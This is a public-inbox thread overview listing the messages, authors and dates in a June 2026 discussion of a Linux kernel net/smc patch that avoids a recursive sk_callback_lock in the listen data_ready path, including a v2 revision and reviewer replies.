end of thread, other threads:[~2026-06-25 8:32 UTC | newest] Thread overview: 9+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao 2026-06-18 6:24 ` Mahanta Jambigi 2026-06-18 14:16 ` Runyu Xiao 2026-06-19 5:36 ` Mahanta Jambigi 2026-06-19 5:48 ` [PATCH net v2] " Runyu Xiao 2026-06-23 10:38 ` XIAO WU 2026-06-24 10:37 ` Runyu Xiao 2026-06-19 6:35 ` [PATCH net] " Dust Li 2026-06-25 8:32 ` Sidraya Jayagond
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox